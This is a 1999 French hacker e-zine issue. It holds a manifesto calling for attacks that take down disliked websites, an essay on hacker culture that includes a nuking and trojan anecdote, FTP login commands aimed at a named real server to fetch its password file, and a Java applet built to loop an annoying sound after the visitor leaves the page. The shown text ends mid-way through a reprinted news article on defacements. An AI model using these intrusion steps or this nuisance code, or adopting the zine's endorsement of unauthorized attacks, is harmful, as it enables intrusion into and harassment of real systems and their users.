____________ _ _ _ _ _ __________ _ / / / / // / / / / ___ / / /___________/_/ / // / / / / / / / / / / / / // / / / / /___/ / / / / / ___ / // / / / __ / ____ / / ___ / / / / / / \_/ / / / / / / / / / / / / /____/_/ /__/ \_____/_/ /__/ /__/_/ /__/_/ /__/ THE UNDERGROUND ANGELS ------- HTTP://undergroundangel.cjb.net HTTP://WWW.multimania.com/TUA/ #TUA et #Hack.fr sur irc.kewl.org 6667 (Le Samedi soir) white_angel_tua@hotmail _______________ | E-Zine Nø4 | |Par White Angel| |_______________| SEPTEMBRE 1999 A LIRE DANS WORDPAD ! ====================================================================== EDITORIAL ====================================================================== Et c'est repartis...Pour un 4ème numéro de The Underground Angels Après de belles vacances comme ça, nous revoilà en pleine forme pour vous apprendre de nouvelles techniques.... Toujours plus de monde sur notre site, toujours plus de membres et toujours plus de lecteurs... Mais avant tout pour les nouveaux, une présentation du groupe. Qui sommes nous ?? TUA est une organisation underground rassemblant des personnes franco- phones de tout pays (France, Belgique, Canada...etc). Nous sommes principalement des hackers(débutants ou confirmés) qui veulent remettre un peu d'ordre sur Internet en supprimant les sites suivants: -Sites pédophiles -Sites Racistes -Sites Nazis (SS, FN....) -Sites de pays ou les droits de l'homme ne sont pas respectés. -Sites prônant l'esclavagisme (Hommes, Femmes, Enfants...) -Sites de sociétés utilisant des animaux pour des expériences ou pour des fourrures. -Des grosses entreprises dangereuses (Microsoft, France Télécom) -Sites de sectes (Eglise de la Scientologie...) -Autres sites empécheur de tourner en rond.... Pour nous, internet est quelque chose de précieux qu'il faut protéger. Nous devons alors attaquer et frapper là ou ca fait mal et surtout là… où les autorités ne peuvent pas agir. Mais aussi, pour nous, le hack est une philosophie de vivre, un art et surtout un moyen de faire passer nos idées... Le Hacking, c'est aussi une philosophie qui consiste à régler des problèmes et à relever des défis que la plupart des gens contourneraient ou ne verraient même pas. Utiliser des moyens détournés pour accéder à des choses que personne ne connait. Ce n'est pas le résultat qui compte mais la méthode employée... Voilà. en ce qui nous concerne, nous ne faisons pas ça pour l'argent ni pour la gloire...Mais plutôt pour nous faire connaitre et prouver au monde entier que le hacking n'est pas un délit mais plutôt un nouveau moyen d'expression qui fait très peur à tous les gouvernements... Et aussi pour empêcher certains sites et organisations de venir polluer notre réseau, Internet, que je considère comme mon réseau, ton réseau, les autres (Mr Tout_le_monde) ne sont que "tolérés" par nous tant qu'ils ne nous nuisent pas et ne nuisent pas au réseau.... White Angel Sinon, un conseil, apprenez, apprenez et après, rejoignez nous !!! [Nd MadDany : et apprenez encore un peu après ça ! :o)] ======================================================================== SOMMAIRE ======================================================================== au sommaire cette fois ci: -Devenir et Reconnaitre un Hacker (White Angel) -Exploits FTP (Korben) -Initiation à la programmation Java (MadDany) -Bonus -Liste des ports (MadDany) -Hack de serveur Web avec votre Browser (White Angel) -Test (MadDany) -Rester anonyme sur le Web (White Angel) -WinGates (MadDany) -Xoom.com (Korben) -Rejoignez nous !! -Remerciements !! ======================================================================== DEVENIR UN HACKER/RECONNAITRE UN HACKER...etc ======================================================================== Texte qui résume bien la façon de penser du hacker et qui permet de faire un tour très rapide de notre communauté Underground... copier/coller du zine 2020hack par Clad Strife (la flemme me perdra...) (G viré le passage sur Back Orifice...) [Nd MadDany : et moi j'ai corrigé les fôtes d'ortograf] [Nd WA : Merci gars car ceux de 20/20hack ils sont 0/20 en orthographe] __________________________________________________________________________ Le hacking est un phénomène qui touche de plus en plus de gens partout dans le monde! De plus en plus de gens sont intéressés par cette mentalité qu'est celle du hacking... Nombre de personnes rêveraient de devenir hacker. Et nombre de personnes se font une mauvaise image du hacker en général. Car en effet il faut différencier les types de pirates: Il y a: · Les crashers: les crashers sont de dangeraux pirates qui détruisent tout pour le plaisir... cette mentalité est peut-être l'une des moins répandues, car il faut savoir que les crashers sont très souvent haïs par le milieu du piratage. A éviter donc. · Les crackers: ils sont là pour cracker les programmes (ex: enlever le passworrd d'un file en le désassemblant pour le diffuser ensuite sur internet). Les crackers ne sont pas fondamentalement dangereux. les très bons crackers sont de véritables génies (il faut le dire) de la programmation. sans eux le réseau internet ne serait pas ce qu'il est maintenant. · Les lamers: en général ce sont les débutants dans le milieu du piratage... Ce sont souvent les "bizus" des élites! Si vous débutez dans le milieu du H/P/C/V (hacking, cracking, phreaking etc...)essayez d'acquérir un certain niveau de connaissance seul... en général les élites du dessus n'hésiteront pas à vous filer un ou deux trojans entre quelques programmes. sauf si c'est quelqu'un que vous connaissez bien ou qui est votre ami. · Les phreakers: le phreaker est un pirate du réseau téléphonique en général... Mais il peut aussi pirater sa borne EDF, graver des cd crackés etc... En général les phreakers se mêlent rarement au milieu du hacking. Tout ce qui concerne le piratage de la ligne téléphonique du voisin pour se faire des minutes gratos ça les concerne! · Les hackers: ce sont les pirates du net... Les meilleurs du hacking sont quasiment inconnus. Jusqu'au jour ou ils pratent le Pentagone et qu'ils se font choper! La moyenne d'âge des hackers tourne entre 15 et 25 ans. Ils piratent n'importe quoi. Par simple défi. Par pur plaisir. Les hackers s'attaquent rarement aux autres internautes! Mais méfiez vous! Les hackers sont un peu crashers dans leur côté obscur. Donc c'est surtout des hackers dont nous parlerons. Il faut savoir que les médias donnent une mauvaise image du hacking, en faisant des articles diffamateurs ou en médiatisant le mauvais côté du hacking. Les médias profitent de l'ignorance que les gens ont sur le piratage pour détruire la VERITABLE image du hacker! Sans les hackers allez savoir si votre réseau internet existerait! Internet était au départ un réseau militaire. Mais les universitaires et les scientifiques en ont fait le réseau internet. Et pas les médias (qui font jamais bien leur boulot d'ailleurs :-))! Des universitaires! Donc tout ça pour vous dire que ce que les médias pourront vous raconter sur le piratage informatique ne sera pas toujours juste. Mais si on a tendance à penser qu'un hacker est un dangereux criminel, celui-ci aura tendance à se criminaliser; c'est psychologique. Mais les hackers sont loin d'êtres tous dangereux... [Nd MadDany : nous sommes loin d'être ***tous*** dangereux... harf harf harf] Certains hackent même pour prouver qu'aucun système de sécurité ou sytèmes d'exploitation n'est infaillible. Ce qui nous permet de démontrer que Windows est une vraie "passoire" (pardonnez l'expression). Ainsi on pourrait s'imaginer que certains trous de sécurité sont volontaires. D'ailleurs Microsoft a fait en sorte que Money99 (qui n'est pas encore officiellement sorti) ne marche que si Microsoft Intenet Explorer 4 est installé! Les accusations qui se font au sujet de Bill Gates, comme quoi son but serait de détenir tout le marché de l'informatique, peuvent être considérées comme vraies! Pas à 100%. Mais il faut avouer que Microsoft est ce qu'est Coca-Cola par rapport à la grenadine. Les statistiques démontrent que Microsoft détient environ + de 90% du marché informatique, mais... pouvons nous incriminer Bill Gates? car si vous êtes pas content y'a toujours Linux ou Unix! Et vous devez aussi avoir Netscape Navigator sur votre bécane, non? Bref pour clore cette introduction je tiens quand même à vous dire que, bien que les médias arrangent les faits à leur manière, ceux-ci ne sont jamais forcément erronés. ----- 2°/ Un hacker... c'est quoi au juste? ----- Ben... comment vous expliquer ça. Un hacker (je vais faire quand même un petit récapitulatif de ce qui a été vu plus haut), c'est un pirate qui essaie de découvrir les failles de chaque système, c'est quelqu'un qui crée des programmes de piratage etc..., par simple défi. Pas pour le fric (pas toujours: la tune tombe pas des arbres). Bref... Les hackers forment aussi une "communauté" ou l'on se doit d'être solidaire... Les hackers se tapent rarement dessus. [Nd MadDany : il y en a qui devraient lire ce passage une centaine de fois avant de se coucher, tous les soirs pendant deux ans...] Mais le hacking c'est aussi une mentalité. Une volonté. On ne se lance pas dans le hacking pour déconner. Non... En général on va jusqu'au bout. Rares sont ceux qui ont abandonné en cours de route. Il y a tellement de choses à découvrir dans le monde du piratage que cela revient à en découvrir un nouveau monde: l'autre côté de l'utilisation d'un ordinateur. Pas forcément le côté obscur de l'utilisation d'un ordinateur mais surtout les possibilités que ce côté peut nous offrir (si vous voyez ce que je veux dire!). Il faut savoir qu'il y a différents aspects dans le hacking! On peut facilement se les imaginer: études des différents systèmes de sécurité, création de programmes, piratage du pc d'un pauvre internaute etc... en général les très bons hackers sont appelés: Elites et sont quasiment inconnus! Si jamais vous en rencontrez un ou que vous avez judicieusement su en reconnaitre un, eh ben gardez ça pour vous. Rien de pire que de s'attirer des emmerdes, de toute la communauté hacker, qu'en dénoncant " un de l'élite". Mais un hacker c'est aussi une personne comme vous et moi! On ne doit pas s'imaginer que parce qu'une personne pirate elle se différencie forcément de la société dans laquelle vous vivez. Elle est contribuable, regarde la télé (Eh oui! Ca lui arrive!), dort dans un lit, etc... mais un hacker c'est aussi une personne aimable, courtoise et pas forcément belliqueuse! Loin de toutes les idées reçues ce serait plutôt le contraire: tendance pacifique. Mais bon... Y'a des exceptions hein! Faudrait pas s'faire des illusions! (on va finir par croire que je contredis ce que j'écris!) ----- 3°/ Savoir reconnaitre un hacker et devenir hacker ----- Bon... Il faut savoir que ce sera pour vous un honneur si vous rencontrez dans votre vie une personne de l'élite(c.f. para 2°/). Donc il sont très très difficilement reconnaissable, de plus c'est pas lui qui vous le dira! Comptez pas là-dessus! Il vous faudra vous contenter de reconnaitre les hackers (je dirais pas les moyens), mais ceux qui ont dépassé ce stade de débutant. Ceux qui savent des trucs, ceux qui peuvent vous apprendre des trucs mais pas des débutants (bien qu'il ne sache pas tout). Donc je vais vous expliquer comment reconnaitre un hacker... Mais d'abord un petit point que je voudrais éclaircir... J'avais lu un e-mag qui disait: "pour être un hacker il faut mettre des 3 à la place des E, des 5 à la place des S, des 0 à la place des 0, de mettre des Z à la fin de chaque mot au pluriel etc..." ce qui pouvait donnait des phrases totalement absurdes. Cet E-mag disait aussi qu'un hacker est fier d'avoir une orthographe complètement nulle et il le montre. Inutile de vous dire que ces informations m'ont donné envie de vomir. rien de pire que de prendre les gens pour des cons. [Nd MadDany : t'es gentil Clad mais t'aurais du lire ton texte jusqu'au bout, c'était une satyre, une parodie. Pour rigoler quoi. Dans l'esprit du TrOu dU cul'Z hiD3oUt.] [Nd WA: D'ailleurs, l'élite à un language soutenu dans le genre 'upper class'] Si une personne arrive sur le chat avec une orthographe pas possible et une écriture de dément, inutile de vous poser trop de questions: CETTE PERSONNE N'EST PAS HACKER ET ELLE LE MONTRE. Rien de moins sérieux qu'une personne faisant exprès d'avoir une orthographe éxecrable et une écriture pas possible. Car un hacker (en général) est quelqu'un de sérieux et essaie d'avoir au maximum la meilleure orthographe et écriture possible! [Nd MadDany : ;^)] Mais on peut aussi se dire que l'habit ne fait pas le moine. Que les hackers n'ont pas forcément une bonne orthographe. c'est vrai! Il ne faut pas préjuger! mais sachez faire la différence. Mais inutile de vous dire que si un mec arrive sur un chat en gueulant à qui veut l'entendre: "Je suis hacker! Je suis le meilleur des pirates" et autres insanités, cette personne n'a même pas du se poser la question une fois dans sa vie, ce qu'était un hacker... encore un blaireau... Inutile de demander son chemin à cette espèce là! Il y a aussi le mec qui répond n'importe quoi ou qui se ramène avec des nicks trop évidents (ex: hack-man), qui lui doit en savoir un peu plus que l'autre blaireau mais bon... Un peu trop orgueuilleux! Parce que je vais vous raconter une anecdote: j'connais un mec qui s'est ramené sur le chat en beuglant: "Je suis un pirate! Je suis un hacker!". Obligatoirement je lui ai demandé de me le prouver. Je n'attendais aucune réponse bien sérieuse de sa part. D'ailleurs je n'en ai pas eu. Ce mec j'ai réussi à trouver son UIN, son IP et tout le bla-bla... alors au début je lui ai parlé piratage (sur icq), histoire de voir s'il en connaissait un bout... J'lui ai envoyé des files pour qu'il puisse se démerder (parce que je me suis tout de même aperçu qu'il ne savait rien! MAIS RIEN DU TOUT! Mais bon... comme il était intéressé...), et après il m'a dit (je vais reproduire le dialogue): comment on fait pour lire ton file??? ben... tu le dézipes et tu lis le txt! c'est quoi un txt? Tu sais même pas ça? ohlàlà! c'est un document texte! Ahh! Et pour le dézipper? Coment k'on fait? tu cliques 2 fois rapidement sur le logo! Ah! *user is away* Ca marche? *user is away* hohé!!! (là je fais ctrl+G ( ça fait du bruit chez l'autre)! On aurait dit que le mec se serait endormi sur son clavier; le *user is away* signifiant qu'il est plus sur le chat) Ouais et ben ca marche po! (le con savait pas dézipper) Putain! t'es naze comme mec! ohoh! calme toi! Je te signale que j'ai des trucs qui font mal très mal!!! (il venait de télécharger un nuker et Nonuker! Alors il essaie de me nuker! Le fire-wall détecte! Je chope son IP! Je bloque l'attaque, puis je sors un autre nuker, je le nuke sur un autre port que le 139, mais son anti-nuker détecte. AÏE!) t'es vraiment nul! Connard! t'as un nuker et tu te crois le boss des hackers! l'élite! tu me fais pitié! pff! Tais-toi sinon je te fais très mal! J'ai des trucs qui bousillent! (bien sur il a que dalle!) C'est vrai? Oh non! Pitié! Pas ça! hahahahahahahahaha! Ben vas-y essaie! J'ai envie de rire! Tu me fais hurler de rire t'es un bouffon! Tais-toi sinon j'appele mon copain! c'est lui qui m'a filé les programes!!!* Encore un blaireau... oh et puis merde j'me casse! t'es trop con! Enfoiré *User has left the chat* Bon eh ben lui il m'a grave fait chier! Sauf que j'appris par la suite que son copain c'était J (secret aussi), un de mes potes qui entre deux nukers lui avait filé un trojan! Alors... ce mec si vous le rencontrez et que vous reconnaissez sa manière de faire, n'hésitez pas à lui "foutre un pain sur la gueule"! J'avais manqué de tact ce jour là mais bon... De plus j'avais son tel. Il a passé un sale quart d'heure! Il a plus recommencé. Mais si je vous raconte cette anecdote c'est pas pour rien. C'est pour vous démontrer que des gros cons (pardonnez l'injure mais ça défoule) orgueuilleux y'en a partout! Revenons à nos moutons... J'ai souvent vu marqué qu'un vrai hacker se devait d'avoir Linux (dans d'autres E-mags Unix), s'il voulait devenir un VRAI hacker... Mais pour en revenir à notre premier E-mag (c.f. début chapitre), celui-ci disait: "vous devez avoir Linux sinon c'est inutile d'essayer d'être hacker. Là j'ai vomi :-). Comment peut-on dire des choses aussi absurdes! On peut très bien être hacker et ne pas être sous Linux ou Unix! Pourquoi pas sous Windows95 ou Windows98! Moi je suis sous Windows95 et j'en suis fier! Bien que Linux n'est absolement pas négligeable pour hacker! [Nd MadDany : Linux sucks !!!] Mais de là à dire que c'est l'outil qu'on se DOIT d'avoir, là non!!! Rien de plus faux! je le dis, je le répète! Et je continuerais de le répéter! J'avais aussi remarqué que les hackers (les bons et les débutants), mettaient souvent des petits signes distinctifs, dans certains mots, tel que: Micro$oft ou transformait des mots pour en faire des: zindaube, winfuke, microdobe, etc... Nous sommes loin des critères débiles du E en 3 et du O en 0! Non... Là ça a surtout un caractère humoristique qui tient à démontrer que l'on se moque bien de windows et de ses trous de sécurité! donc pour se démarquer de tous ces débiles qui prenne ça à la légère! Je vais aborder un autre type de personnes qui existent: les lamers (c.f.: chapitre1). Les lamers sont loin d'être des gros cons... Au contraire. ce sont en général des personnes qui débutent dans le milieu! Il n'est pas exclu de les aider! Il sauront vous le rendre tôt ou tard! Les lamers disent qu'ils aimeraient être hacker et demanderont au premier venu de leur enseigner pour peu que celui-ci s'y connaisse un peu. c'est pourquoi, vous recevrez souvent des messages de lamers qui vous demanderont de leur apprendre le hacking. Evitez de les envoyer balader! Ils vous ont rien fait ;-). Vous aussi vous avez été lamers au tout début de votre période! Vous aussi vous avez demandé à des gens de vous apprendre! Alors??? Bref... Essayez de vous démarquer des blaireaux sans pour autant ne pas vous amuser à glisser un petit Zindaube dans la conversation :-)!!! (Non. en fait je dis ça car j'aimais pas trop qu'on m'envoie promener au début de mon apprentissage!) __________________________________________________________________________ Voilà, cela résume bien le hacking en général...Ca, c'est pour les Newbies. Un petit repère.... WA ======================================================================== EXPLOIT FTP ======================================================================== Assez vieux mais bon, c juste pour le fun... A essayer sur certains serveurs.... lancer command.com taper: >ftp -n le prog se lance, vs avez alors: ftp> Là, vous tapez la commande open suivie du nom du site ou de son IP ftp>open www.front-nat.fr Un message défilera...Bienvenue...etc une fois connecté, tapez: ftp>QUOTE user ftp User name accepted, enter a password ftp>Quote cwd ~root Please login with user and pass before ftp>QUOTE pass ftp et voilà, normalement, vs êtes connecté à la machine... tapez ? pour avoir la liste des commandes... [Nd MadDany : en faisant ça on se logge en tant que guest, avec toutes les restrictions d'usage. C'est bien pour choper les fichiers passwd par exemple mais n'oubliez pas que vous êtes tout de même loggé, toutes les commandes que vous tapez, votre IP et votre hôte, tout ça est enregistré. Alors imaginez pas que vous êtes root rien qu'en tapant ça. De plus si vous faites juste get etc/passwd et que vous vous déconnectez en suivant c'est pas très discret vos intentions.] Korben ======================================================================== The ultimate guide to eating rotten worms, by MadDany ======================================================================== Bienvenue dans ma collection des titres-qui-n'ont-rien-à-voir-avec-le-reste-de-l'article. Donc, comme son titre ne l'indique pas, cet article est une introduction au Java. Le Java est un langage de programmation, qui est encore peu connu. Il a été créé pour apporter avec les mêmes objectifs de l'HTML, mais pour faire cette fois un vrai langage de programmation. Pour les incultes, l'HTML a été développé pour que des documents puissent être visibles sur toute la planète, et fonctionnent de la même manière. Pari réussi, vous pouvez tous visualisez des pages web, que vous soyez sous Zin, Mac, Linux... Donc le Java est un langage de programmation qui est portable, c'est à dire qui permet de créer des programmes fonctionnant indiféremment de l'environnement de travail. Pour cela, la solution était simple, au lieu de faire des programmes exécutables "classiques", on va faire des programmes s'utilisant depuis une interface, et c'est cette interface qui va changer d'un OS à l'autre. Donc vous pouvez écrire vos programmes en Java en sachant que sans aucune modification il pourra tourner sur l'ordi de votre pote qui a un Mac (bouuuhhh les macs !!!). Maintenant entrons dans les spécifications de Java : il existe deux types de programmes : les applets et les applications. Les applets sont spécialement conçus pour être intégrés à des pages web, et pouvoir ainsi améliorer le niveau technique de ces dernières, l'interactivité, la sécurité, ou l'ergonomie... les applications sont de vrais programmes, ils s'utilisent non plus depuis votre browser mais depuis une interface Java spécifique. Comme vous n'en possédez sûrement pas, vous pouvez télécharger le JRE à cette adresse : http://www.java.sun.com/products/ Le JRE (Java Runtime Environment) vous permettra d'utiliser les applications Java (qui sont en .class), mais aussi les applets grâce à l'appletviewer. L'avantage de visualiser les applets à partir de cet outil c'est que l'appletviewer est bien plus performant que la console Java de votre browser, et qu'en plus il est compatible avec les fonctionnalités de Java 2, alors que les consoles Java des browsers en sont toujours à Java 1.0.2 ou 1.1 pour la plupart. Les applications et les applets Java sont des fichiers portant l'extensions .class, comme ils ne sont pas exécutables vous ne pourrez rien faire en cliquant dessus. Pour les utiliser placez les dans le répertoire bin du JRE, en principe celui où vous trouverez le programme java.exe. Pour les visualiser, placez vous dans ce répertoire en passant par le DOS (je sais pas comment on fait pour les autres OS), puis tapez java nomdufichier, en supposant que votre programme s'appelle nomdufichier.class. Si ce programme est un applet, tapez appletviewer programme. Vous connaissez les principes de base de Java, et comment utiliser des programmes écrits avec ce langage fabuleux ! Maintenant il se peut que vous tombiez sur des fichiers sources de programmes écrits en Java, je vais donc rapidement décoder certains éléments. Voici un fichier source d'applet que j'ai réalisé, mes commentaires sont soit entre /* et */, soit après // : -------------------BEGIN SOURCE CODE-------------------- /* cet applet a été créé par MadDany. Lorsqu'il est exécuté depuis un browser, il joue un petit son énervant, et il continue de le jouer même si on quitte la page contenant l'applet (étant donné que c'est la console java du browser qui se charge de jouer le son, ce genre d'évènements est alors indépendant de la page en cours). Les seuls moyens d'arrêter ce son sont : 1)fermer le browser ou 2)couper le son. Cet applet marchera sur n'importe quel browser compatible Java 1.0.2 ou 1.1, comme Netscape 4.0 ou Internet Explorer 4.0 (ou plus). Il est possible de changer le texte qui va apparaitre dans la fenêtre d'applet en insérant un tag entre les tags , où blablabla est le texte que vous voulez voir apparaitre. Si quelqu'un prend la peine d'améliorer cet applet, qu'il m'en envoie une copie à maddany@multimania.com. Merci If anybody upgrades this applet, please send me a copy at maddany@multimania.com. Thx MadDany 1999 */ /* importation des classes nécessaires à l'exécution du programme ces classes sont des programmes déjà écrits, dont je vais importer les caractéristiques dans cet applet. J'explique ce principe plus loin. */ import java.awt.Graphics; import java.applet.AudioClip; import java.awt.Color; import java.awt.Font; public class AudioTrap extends java.applet.Applet implements Runnable { // déclaration des variables AudioClip beep; Thread runner; Font police1 = new Font("Impact", Font.BOLD, 100); String texte; // début du Thread jouant le son public void start() { if (runner == null) { runner = new Thread(this); runner.start(); } } // arrêt du Thread, sans pour autant arrêter le son !!! public void stop() { if (runner != null) { runner = null; } } // chargement des différents paramètres, comme le son et le texte à partir de la page web public void init() { texte = getParameter("texte"); if (texte == null) texte = "LaMaH FuCk !!!"; beep = getAudioClip(getCodeBase(), "beep.au"); } // le son est joué en boucle public void run() { if (beep != null) beep.loop(); Thread thisThread = Thread.currentThread(); } // définition des paramètres graphiques public void paint(Graphics screen) { setBackground(Color.black); screen.setFont(police1); screen.setColor(Color.red); screen.drawString(texte, 0, 300); } } -------------------END SOURCE CODE-------------------- Avec les commentaires c'est pas bien sorcier non ? Je vais décortiquer plus précisément. Java est un langage orienté objet, c'est à dire que vous allez définir une classe (les classes sont comme des minis programmes, mais dont certains ne font rien, les classes peuvent très bien seulement définir un comportement) avec un comportement assez abstrait, regroupant surtout des variables et des méthodes générales. Puis vous allez créer des sous classes de cette classe qui vont hériter de son comportement, ses variables, ses méthodes... et ainsi de suite, à chaque fois que vous créez une sous classe, vous affinez un peu plus le fonctionnement, jusqu'au moment ou vous créez des instances de ces sous classes, comme des bébés. Ces bébés vont hériter du fonctionnement de leurs parents, les classes sont là pour dire aux instances (ou objets) comment se comporter. Voici le principe de la programmation orientée objet. Donc au tout début du programme, avec la commande "import", je vais faire appel à des packages de classes qui vont apprendre à mon programme à faire des choses en lui faisant hériter de leur fonctionnement. En l'occurence je vais pouvoir dessiner des choses, jouer des sons, utiliser des couleurs et des polices d'écriture spéciales. Ensuite je définis la classe, ce qui va permettre à mon applet d'être utilisée correctement. Je mets dedans le fragment "extends java.applet.Applet" pour dire que ce programme est un applet, et donc qu'il en reprend toutes les caractéristiques. En faisant cela, je crée une sous classe de la classe Applet. Je mets aussi "implements Runnable", qui ressembvle beaucoup au fragment précédent. La formulation est différente parce que je reprend le comportement d'une interface, en l'occurence Runnable. Il existe beaucoup de similarités entre ces deux opérations, après cela devient très technique. Ensuite je déclare mes variables. Comme leur nom l'indique, les variables sont un type d'objet (que je vais pouvoir utiliser dans tout le programme car je les ai déclarées au début) dont la valeur poura changer selon mes besoins. Les variables peuvent être de type numérique (un entier, un chiffre à virgule flottante...), du texte que l'on fera varier, et bien d'autres... le fonctionnement d'un déclarement de variable est simple, il suffit de mettre le type de variable puis le nom de la variable que j'ai choisi.Par exemple : "String texte" crée une variable de type chaîne (du texte) que j'ai appelé texte. A tout moment je pourrais affecter une valeur à cette variable en mettant simplement "texte = "ceci est un magnifique texte"". Vous remarquez qu'à la fin de chaque ligne se trouve un ";", c'est pour indiquer plus clairement ce que l'on fait au compilateur. Certaines lignes ne comportent pas de ";" mais des accolades. Le texte se trouvant entre ces accolades est appelé bloc. Dans ma déclaration de classe (public class AudioTrap...), j'ai mis une "{" pour indiquer le début des instructions du programme, la dernière ligne sera une accolade fermante "}" qui va indiquer la fin de cet état. Et ainsi de suite pour chaque portion du programme. Ensuite je dis au Thread de commencer son travail. Les Threads sont utilisés dans des applets pour dire au programme ce qu'il doit faire quand il a plusieurs actions à effectuer, il permet de respecter une marche pré-définie. En l'occurence j'aurais pu me passer de Thread vu que l'applet ne fait que jouer un son. Vous remarquez une ligne ressemblant à la déclaration de classe : "public void start() {...}". Ceci est une déclaration de méthode, c'est à dire une portion de programme qui fait ce qu'on lui demande quand la méthode est appelée. Ici je redéfinis la méthode start() contenue dans la classe Applet, pour dire à mon applet ce qu'elle doit faire lorsqu'elle commence. Toutes les autres méthodes doivent être normalement redéfinies dans un applet pour en spécifier le comportement, comme stop(), init() ou paint(). paint() n'est pas obligatoire, c'est uniquement lorsqu'on veut dessiner quelque chose dans la fenêtre d'applet (en l'occurence on veut dessiner du texte). La méthode run() est différente, elle ne nous vient pas de la classe Applet mais de l'interface Runnable qui régit les Threads. Ensuite dans chaque redéfinition de méthode j'utilise le plus souvent des conditionnels. Ces conditionnels sont faciles à reconnaître, ils sont sous la forme : if (condition à remplir) ce qu'on fait si la condition est remplie; else ce qu'on fait si la condition n'est pas remplie; Souvent on n'a pas besoin d'utiliser le mot-clé "else" car les conditions se remplissent d'elles même ou alors on a pas besoin de définir un comportement si la condition n'est pas remplie, puisque souvent il s'agit de ne rien faire. Par exemple examinons le conditionnel suivant : if (beep != null) beep.loop(); Ceci signifie que si notre variable beep (le son qui doit être joué) n'est pas paramétrée sur null, le son va être joué en boucle. En clair le son va être automatiquement joué en boucle puisqu'à aucun moment on ne le paramètre sur null. En principe on devrait mettre "beep = null;" dans la méthode stop(), qui est chargée de stopper le Thread une ligne qui paramètre beep sur null, et ainsi l'applet se termine normalement lorsque vous quittez la page web. Voici la méthode telle qu'elle devrait apparaître : public void stop() { if (runner != null) { runner = null; beep = null; } } La méthode stop() est appelée par définition lorsque vous quittez la page contenant l'applet, le conditionnel dit ici que lorsque la page est quittée, si le Thread tourne encore il doit être arrêté, ainsi que le son. Dans la version de mon applet le son ne s'arrête pas, je profite ici du fait qu'il est joué non pas par le navigateur lui même (qui gère uniquement la page en cours) mais par la console java de ce dernier, qui fait uniquement tourner les applets sans s'occuper de la page qui les contient. C'est d'un défaut entre l'interaction de ces deux programmes que l'on profite en fait :o). Avec tout ce que vous venez d'apprendre vous ne saurez évidemment pas programmer en Java, mais vous pourrez mieux comprendre ce que font les programmes dont vous verrez les fichiers source. Et puis ça épate toujours les copains ;^) J'espère avoir été clair, et peut être vous avoir donné envie d'apprendre vraiment la programmation Java. Il suffit de vous acheter un bouquin sur le sujet (j'ai "Le Programmeur Java 2" aux éditions Campus Press, c'est pas mal, même si il y a des passages qu'ils résument un peu trop). Si vous voulez pouvoir compiler vos fichiers sources, il vous faut un autre outil que le JRE, le JDK ou le SDK par exemple. Vous pouvez trouver tous ces produits sur http://www.java.sun.com/, moi j'utilise le JDK (Java Developper Kit). Pour compiler des fichiers sources en Java, il suffit de les enregistrer dans un fichier .java respectant le nom de la classe. Je m'explique, dans la définition de classe de mon applet j'ai mis "public class AudioTrap", sauvegardez donc ce fichier dans un nouveau fichier texte, et enregistrez le sous le nom "AudioTrap.java", AVEC LES GUILLEMETS. Ainsi votre traitement de texte ne mettra pas l'extension .txt, et vous aurez un magnifique fichier source .java prêt à être compilé. Ensuite mettez ce fichier dans le répertoire bin du JDK (si vous avez pris le JDK), celui contenant normalement le programme javac.exe, et sous DOS tapez javac nomdufichier.java. Vous obtiendrez alors un nouveau fichier nomdufichier.class prêt à être utilisé. Note : comparez ces deux expressions : javac nomdufichier.java java nomdufichier Vous remarquez qu'on ne marque pas l'extension avec le programme java, ça n'a l'air de rien mais j'ai mis un moment pour me rendre compte que je n'arrivais à utiliser aucun programme parce que je marquais java nomdufichier.class Alors refaites pas mon erreur... Si vous voulez des conseils en Java, n'hésitez pas à m'écrire maddany@multimania.com .oO(si vous êtes une fille avec des gros seins et que vous me trouvez génial vous pouvez me laisser votre numéro de téléphone pour des cours particuliers) [Nd WA: Tiens là, Mad ne met pas de commentaires...haha p'tet parce que c'est son article..arf !] ======================================================================== BONUS ======================================================================== Pour ceux qui comprennent l'anglais: --------------------------------------------------------- Computer `crackers' set sights on .gov for chaos by Mark Mueller Sunday, August 1, 1999 It was the kind of threat for which computer hackers are famous, a declaration of war dripping with the risk-free bravado so common on the anonymous Internet. The warning, which appeared on a hacked Web page of the U.S. Interior Department in late May, promised unrelenting attacks against government computers to avenge an FBI roundup of hackers associated with the group Global Hell. Just weeks earlier, Global Hell had claimed responsibility for an attack on the White House's main Web page. ``Now, it's our turn to hit them where it hurts by going after every computer on the Net with a .gov,'' the message read. ``We'll keep hitting them until they get down on their knees and beg.'' That the threat was made - risking the pique of the FBI - isn't as surprising as the follow-through. In recent months, hackers, or crackers, as bad-guy hackers are known, have indeed blazed through a wide swath of government and university computers, defacing some Web sites and shutting down others. Among the high-profile targets: the U.S. Senate (twice), the Army, the Navy and the Departments of Agriculture, Labor and the Interior. Computer systems also were hit at Georgetown University, the University of Colorado, the University of Michigan and Harvard University. The most brazen of the attacks targeted the lion's den itself: the FBI Web page, which was out of service for nearly a week as programmers beefed up security on the site. Jim Settle, former chief of the FBI's computer crimes squad and now an Internet security consultant, calls the FBI strike ``an out-and-out declaration of electronic warfare.'' For some, it's a war that can't afford to be lost. The feeble network that once was the domain of a few scientists is now a robust and far-reaching behemoth that caters to hundreds of millions of people, some of whom pay their taxes, buy goods and send intensely personal information through their computers. In the wrong hands, such information could prove embarrassing or costly. Seen in its most sinister light, computer intrusion is a threat to national security. But the self-proclaimed ``warriors'' who carried out the recent attacks against government Web sites hardly sound like cyberspace shock troops. Their loose-knit groups bear names like the ``Keebler Elves,'' the ``Masters of Downloading'' and ``Hacking for Girlies.'' When they hack sites, they traditionally leave behind inane scrawlings - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends. Those familiar with the hacking subculture say such groups are generally composed of teens - and occasionally people in their early 20s - with a lot of computer equipment and too much time on their hands. ``These are just immature kids doing this from their home computers,'' said John Vranesevich, founder of Anti-Online, a group that tracks hacker activity and that has compiled dossiers on 6,000 hackers. ``It's a game to them. They make a move, and they can't contemplate how it affects people in the real world. It's not reality until the FBI bangs on their door.'' Vranesevich called the recent wave of attacks a ``temper tantrum'' over the May FBI raids, in which agents confiscated computer equipment and questioned teens in 11 cities, including Houston, Seattle and San Diego. A spokeswoman for the FBI in Boston said the New England office was not involved in the operation. Those who deface Web sites - about 1,300 sites have been defaced so far this year, according to the most reliable statistics - justify their actions by arguing they're actually doing companies and organizations a service by pointing out security deficiencies. But law enforcement authorities and others who deal with hackers dismiss the argument. ``I don't buy it,'' said Drew Williams, the founder of an AXENT Technologies' SWAT team to deal with hacker attacks. ``Any hacker group that has not been invited to test security is committing a crime.'' That assessment is shared by David Green, deputy chief of the computer crimes and intellectual property section at the Justice Department. ``This is not just electronic graffiti,'' Green said. 